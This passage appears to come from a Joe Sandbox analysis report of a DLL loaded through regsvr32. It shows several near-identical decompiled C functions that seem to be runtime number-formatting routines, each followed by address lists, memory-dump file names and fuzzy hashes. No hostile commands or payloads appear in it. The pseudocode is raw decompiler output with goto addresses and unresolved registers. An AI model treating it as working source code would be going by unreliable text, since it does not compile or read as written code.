                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001e97a;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001e994;
                                                                      				E00000001180026FBC(_t133, _t149);
                                                                      				goto 0x8001e99b;
                                                                      				E00000001180027068( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001e9c2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001e9b4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001e9c2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001e7f4
                                                                      0x18001e7f9
                                                                      0x18001e7fe
                                                                      0x18001e808
                                                                      0x18001e80b
                                                                      0x18001e80e
                                                                      0x18001e811
                                                                      0x18001e814
                                                                      0x18001e81a
                                                                      0x18001e81c
                                                                      0x18001e81e
                                                                      0x18001e827
                                                                      0x18001e830
                                                                      0x18001e835
                                                                      0x18001e83e
                                                                      0x18001e844
                                                                      0x18001e84c
                                                                      0x18001e866
                                                                      0x18001e86b
                                                                      0x18001e873
                                                                      0x18001e87a
                                                                      0x18001e880
                                                                      0x18001e887
                                                                      0x18001e894
                                                                      0x18001e8a4
                                                                      0x18001e8ab
                                                                      0x18001e8b1
                                                                      0x18001e8bb
                                                                      0x18001e8c5
                                                                      0x18001e8cc
                                                                      0x18001e8d3
                                                                      0x18001e8d9
                                                                      0x18001e8de
                                                                      0x18001e8e7
                                                                      0x18001e8f0
                                                                      0x18001e8f6
                                                                      0x18001e8fb
                                                                      0x18001e8ff
                                                                      0x18001e902
                                                                      0x18001e909
                                                                      0x18001e90d
                                                                      0x18001e918
                                                                      0x18001e91d
                                                                      0x18001e923
                                                                      0x18001e92a
                                                                      0x18001e937
                                                                      0x18001e947
                                                                      0x18001e949
                                                                      0x18001e94d
                                                                      0x18001e955
                                                                      0x18001e965
                                                                      0x18001e96c
                                                                      0x18001e974
                                                                      0x18001e976
                                                                      0x18001e97a
                                                                      0x18001e97e
                                                                      0x18001e988
                                                                      0x18001e98d
                                                                      0x18001e992
                                                                      0x18001e996
                                                                      0x18001e9a3
                                                                      0x18001e9a9
                                                                      0x18001e9b2
                                                                      0x18001e9b4
                                                                      0x18001e9bc
                                                                      0x18001e9bf
                                                                      0x18001e9d8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9e602e0414bb0c1c71089ba1b40ef7c5cc268b3e3a9048885436ea528439986
                                                                      • Instruction ID: 2de11002c490aa0e355f2baa9d29b92358441cf96772a48729e4f38e5bca8de2
                                                                      • Opcode Fuzzy Hash: b9e602e0414bb0c1c71089ba1b40ef7c5cc268b3e3a9048885436ea528439986
                                                                      • Instruction Fuzzy Hash: 0F51C573600E9882E7AE8F28C1543AC37A1E75AB98F14811AEF49177D9CF20CE89C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B6DC(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001b7c3;
                                                                      				if (_t110 == 0) goto 0x8001b72c;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001b817;
                                                                      				if (_t111 == 0) goto 0x8001b79b;
                                                                      				if (_t111 == 0) goto 0x8001b774;
                                                                      				if (_t111 == 0) goto 0x8001b817;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001b7e3;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001b75e;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001b75e;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001b842;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001b859;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001b795;
                                                                      				goto 0x8001b747;
                                                                      				goto 0x8001b747;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001b7bd;
                                                                      				goto 0x8001b747;
                                                                      				goto 0x8001b747;
                                                                      				if (_t118 == 0) goto 0x8001b72c;
                                                                      				if (_t118 == 0) goto 0x8001b72c;
                                                                      				if (_t118 == 0) goto 0x8001b72c;
                                                                      				goto 0x8001b71a;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001b8ac;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001b83a;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001b747;
                                                                      				goto 0x8001b747;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001b862;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001b87c;
                                                                      				E000000011800245BC(_t133, _t149);
                                                                      				goto 0x8001b883;
                                                                      				E00000001180024648( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001b8aa;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001b89c;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001b8aa;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001b6dc
                                                                      0x18001b6e1
                                                                      0x18001b6e6
                                                                      0x18001b6f0
                                                                      0x18001b6f3
                                                                      0x18001b6f6
                                                                      0x18001b6f9
                                                                      0x18001b6fc
                                                                      0x18001b702
                                                                      0x18001b704
                                                                      0x18001b706
                                                                      0x18001b70f
                                                                      0x18001b718
                                                                      0x18001b71d
                                                                      0x18001b726
                                                                      0x18001b72c
                                                                      0x18001b734
                                                                      0x18001b74e
                                                                      0x18001b753
                                                                      0x18001b75b
                                                                      0x18001b762
                                                                      0x18001b768
                                                                      0x18001b76f
                                                                      0x18001b77c
                                                                      0x18001b78c
                                                                      0x18001b793
                                                                      0x18001b799
                                                                      0x18001b7a3
                                                                      0x18001b7ad
                                                                      0x18001b7b4
                                                                      0x18001b7bb
                                                                      0x18001b7c1
                                                                      0x18001b7c6
                                                                      0x18001b7cf
                                                                      0x18001b7d8
                                                                      0x18001b7de
                                                                      0x18001b7e3
                                                                      0x18001b7e7
                                                                      0x18001b7ea
                                                                      0x18001b7f1
                                                                      0x18001b7f5
                                                                      0x18001b800
                                                                      0x18001b805
                                                                      0x18001b80b
                                                                      0x18001b812
                                                                      0x18001b81f
                                                                      0x18001b82f
                                                                      0x18001b831
                                                                      0x18001b835
                                                                      0x18001b83d
                                                                      0x18001b84d
                                                                      0x18001b854
                                                                      0x18001b85c
                                                                      0x18001b85e
                                                                      0x18001b862
                                                                      0x18001b866
                                                                      0x18001b870
                                                                      0x18001b875
                                                                      0x18001b87a
                                                                      0x18001b87e
                                                                      0x18001b88b
                                                                      0x18001b891
                                                                      0x18001b89a
                                                                      0x18001b89c
                                                                      0x18001b8a4
                                                                      0x18001b8a7
                                                                      0x18001b8c0

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ce22b5b27d4caba81ad8f510d6af953eef18bc1c371077dac87c37b34a4c2061
                                                                      • Instruction ID: 10a47591cb8378e8ec74727b237dc796f2640a45f0575280cd4ac09f31ae1970
                                                                      • Opcode Fuzzy Hash: ce22b5b27d4caba81ad8f510d6af953eef18bc1c371077dac87c37b34a4c2061
                                                                      • Instruction Fuzzy Hash: E451C077608A5882E7AA8F28C1543AC37A8E399FD8F158109EF45977D9CF35CE49C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E00000001180027714(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x800277fb;
                                                                      				if (_t110 == 0) goto 0x80027764;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8002784f;
                                                                      				if (_t111 == 0) goto 0x800277d3;
                                                                      				if (_t111 == 0) goto 0x800277ac;
                                                                      				if (_t111 == 0) goto 0x8002784f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8002781b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x80027796;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x80027796;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8002787a;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x80027891;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x800277cd;
                                                                      				goto 0x8002777f;
                                                                      				goto 0x8002777f;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x800277f5;
                                                                      				goto 0x8002777f;
                                                                      				goto 0x8002777f;
                                                                      				if (_t118 == 0) goto 0x80027764;
                                                                      				if (_t118 == 0) goto 0x80027764;
                                                                      				if (_t118 == 0) goto 0x80027764;
                                                                      				goto 0x80027752;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x800278e4;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x80027872;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8002777f;
                                                                      				goto 0x8002777f;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8002789a;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x800278b4;
                                                                      				E00000001180028180(_t133, _t149);
                                                                      				goto 0x800278bb;
                                                                      				E0000000118002820C( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x800278e2;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x800278d4;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x800278e2;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x180027714
                                                                      0x180027719
                                                                      0x18002771e
                                                                      0x180027728
                                                                      0x18002772b
                                                                      0x18002772e
                                                                      0x180027731
                                                                      0x180027734
                                                                      0x18002773a
                                                                      0x18002773c
                                                                      0x18002773e
                                                                      0x180027747
                                                                      0x180027750
                                                                      0x180027755
                                                                      0x18002775e
                                                                      0x180027764
                                                                      0x18002776c
                                                                      0x180027786
                                                                      0x18002778b
                                                                      0x180027793
                                                                      0x18002779a
                                                                      0x1800277a0
                                                                      0x1800277a7
                                                                      0x1800277b4
                                                                      0x1800277c4
                                                                      0x1800277cb
                                                                      0x1800277d1
                                                                      0x1800277db
                                                                      0x1800277e5
                                                                      0x1800277ec
                                                                      0x1800277f3
                                                                      0x1800277f9
                                                                      0x1800277fe
                                                                      0x180027807
                                                                      0x180027810
                                                                      0x180027816
                                                                      0x18002781b
                                                                      0x18002781f
                                                                      0x180027822
                                                                      0x180027829
                                                                      0x18002782d
                                                                      0x180027838
                                                                      0x18002783d
                                                                      0x180027843
                                                                      0x18002784a
                                                                      0x180027857
                                                                      0x180027867
                                                                      0x180027869
                                                                      0x18002786d
                                                                      0x180027875
                                                                      0x180027885
                                                                      0x18002788c
                                                                      0x180027894
                                                                      0x180027896
                                                                      0x18002789a
                                                                      0x18002789e
                                                                      0x1800278a8
                                                                      0x1800278ad
                                                                      0x1800278b2
                                                                      0x1800278b6
                                                                      0x1800278c3
                                                                      0x1800278c9
                                                                      0x1800278d2
                                                                      0x1800278d4
                                                                      0x1800278dc
                                                                      0x1800278df
                                                                      0x1800278f8

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b54a93a2e66ad6466e411f8fa3270fccaa9a388be35e0574f3c1ba0b83814ae6
                                                                      • Instruction ID: 2fddd47366eb7f8569663b2ec29647eb6985a0731b3355499bff8356095f0726
                                                                      • Opcode Fuzzy Hash: b54a93a2e66ad6466e411f8fa3270fccaa9a388be35e0574f3c1ba0b83814ae6
                                                                      • Instruction Fuzzy Hash: D551B377704A5882E7AF8F28C1543AC27A2E359B98F258115EF4D1779ACF30CE4AC780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001D854(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t133 = __rcx;
                                                                      				bpl = __edx;
                                                                      				_t86 =  *((intOrPtr*)(__rcx + 0x34));
                                                                      				_t110 = _t86 - 5;
                                                                      				if (_t110 > 0) goto 0x8001d93b;
                                                                      				if (_t110 == 0) goto 0x8001d8a4;
                                                                      				_t111 = _t86;
                                                                      				if (_t111 == 0) goto 0x8001d98f;
                                                                      				if (_t111 == 0) goto 0x8001d913;
                                                                      				if (_t111 == 0) goto 0x8001d8ec;
                                                                      				if (_t111 == 0) goto 0x8001d98f;
                                                                      				if (_t86 - 0xffffffffffffffff != 1) goto 0x8001d95b;
                                                                      				_t90 =  *(__rcx + 0x28);
                                                                      				 *((intOrPtr*)(__rcx + 0x18)) =  *((intOrPtr*)(__rcx + 0x18)) + _t143;
                                                                      				if ((_t90 >> 0x00000004 & 0x00000001) == 0) goto 0x8001d8d6;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x18)) - 8)) >= 0) goto 0x8001d8d6;
                                                                      				 *(__rcx + 0x28) = _t90 | 0x00000040;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0x8001d9ba;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                      				goto 0x8001d9d1;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				if (( *(__rcx + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0x8001d90d;
                                                                      				goto 0x8001d8bf;
                                                                      				goto 0x8001d8bf;
                                                                      				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 8;
                                                                      				_t118 = dil &  *(__rcx + 0x28) >> 0x00000004;
                                                                      				if (_t118 == 0) goto 0x8001d935;
                                                                      				goto 0x8001d8bf;
                                                                      				goto 0x8001d8bf;
                                                                      				if (_t118 == 0) goto 0x8001d8a4;
                                                                      				if (_t118 == 0) goto 0x8001d8a4;
                                                                      				if (_t118 == 0) goto 0x8001d8a4;
                                                                      				goto 0x8001d892;
                                                                      				_t129 =  *((intOrPtr*)(__rcx + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t129 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t129 + 0x2c)) = 0x16;
                                                                      				_v16 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, _t140,  *((char*)( *((intOrPtr*)(__rcx + 0x18)) - 8)), __rbp, _t156);
                                                                      				goto 0x8001da24;
                                                                      				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 8;
                                                                      				if (0 == 0) goto 0x8001d9b2;
                                                                      				_t149 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8));
                                                                      				goto 0x8001d8bf;
                                                                      				goto 0x8001d8bf;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xfffffff7;
                                                                      				E0000000118001A174(_t133, _t133 + 0x50,  *((intOrPtr*)(_t133 + 0x30)), _t149,  *((intOrPtr*)(_t133 + 8)));
                                                                      				if (_t149 != 0) goto 0x8001d9da;
                                                                      				 *(_t133 + 0x28) =  *(_t133 + 0x28) & 0xffffffdf;
                                                                      				 *((char*)(_t133 + 0x4c)) = 0;
                                                                      				r8b = bpl;
                                                                      				if (_t143 != 8) goto 0x8001d9f4;
                                                                      				E00000001180026660(_t133, _t149);
                                                                      				goto 0x8001d9fb;
                                                                      				E000000011800266EC( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18)) - 8)), _t133, _t149);
                                                                      				if (0 == 0) goto 0x8001da22;
                                                                      				if ( *((intOrPtr*)(_t133 + 0x48)) == 0) goto 0x8001da14;
                                                                      				if ( *((char*)( *((intOrPtr*)(_t133 + 0x40)))) == 0x30) goto 0x8001da22;
                                                                      				 *((long long*)(_t133 + 0x40)) =  *((long long*)(_t133 + 0x40)) - 1;
                                                                      				 *((char*)( *((intOrPtr*)(_t133 + 0x40)))) = 0x30;
                                                                      				 *((intOrPtr*)(_t133 + 0x48)) =  *((intOrPtr*)(_t133 + 0x48)) + 1;
                                                                      				return 1;
                                                                      			}
















                                                                      0x18001d854
                                                                      0x18001d859
                                                                      0x18001d85e
                                                                      0x18001d868
                                                                      0x18001d86b
                                                                      0x18001d86e
                                                                      0x18001d871
                                                                      0x18001d874
                                                                      0x18001d87a
                                                                      0x18001d87c
                                                                      0x18001d87e
                                                                      0x18001d887
                                                                      0x18001d890
                                                                      0x18001d895
                                                                      0x18001d89e
                                                                      0x18001d8a4
                                                                      0x18001d8ac
                                                                      0x18001d8c6
                                                                      0x18001d8cb
                                                                      0x18001d8d3
                                                                      0x18001d8da
                                                                      0x18001d8e0
                                                                      0x18001d8e7
                                                                      0x18001d8f4
                                                                      0x18001d904
                                                                      0x18001d90b
                                                                      0x18001d911
                                                                      0x18001d91b
                                                                      0x18001d925
                                                                      0x18001d92c
                                                                      0x18001d933
                                                                      0x18001d939
                                                                      0x18001d93e
                                                                      0x18001d947
                                                                      0x18001d950
                                                                      0x18001d956
                                                                      0x18001d95b
                                                                      0x18001d95f
                                                                      0x18001d962
                                                                      0x18001d969
                                                                      0x18001d96d
                                                                      0x18001d978
                                                                      0x18001d97d
                                                                      0x18001d983
                                                                      0x18001d98a
                                                                      0x18001d997
                                                                      0x18001d9a7
                                                                      0x18001d9a9
                                                                      0x18001d9ad
                                                                      0x18001d9b5
                                                                      0x18001d9c5
                                                                      0x18001d9cc
                                                                      0x18001d9d4
                                                                      0x18001d9d6
                                                                      0x18001d9da
                                                                      0x18001d9de
                                                                      0x18001d9e8
                                                                      0x18001d9ed
                                                                      0x18001d9f2
                                                                      0x18001d9f6
                                                                      0x18001da03
                                                                      0x18001da09
                                                                      0x18001da12
                                                                      0x18001da14
                                                                      0x18001da1c
                                                                      0x18001da1f
                                                                      0x18001da38

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f0287bdc5f6e0bdd609c1d8286df6db3505000ad90726c639a2b923f8ab922ef
                                                                      • Instruction ID: c6faec9db57e5a06794890d965d4910b11e69964bc8a215d8cacd7bdeb27f617
                                                                      • Opcode Fuzzy Hash: f0287bdc5f6e0bdd609c1d8286df6db3505000ad90726c639a2b923f8ab922ef
                                                                      • Instruction Fuzzy Hash: 8351CC73604E5C82E7AA8F28C0543AC27A1E759B98F158117EF4A177D9CF25CE89C780
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 71%
                                                                      			E0000000118001B8C4(void* __edx, long long __rbx, void* __rcx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
                                                                      				long long _v16;
                                                                      				signed long long _v24;
                                                                      				intOrPtr _t86;
                                                                      				signed int _t90;
                                                                      				void* _t110;
                                                                      				intOrPtr _t111;
                                                                      				signed int _t118;
                                                                      				intOrPtr _t129;
                                                                      				void* _t133;
                                                                      				void* _t140;
                                                                      				void* _t143;
                                                                      				intOrPtr _t149;
                                                                      				void* _t156;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
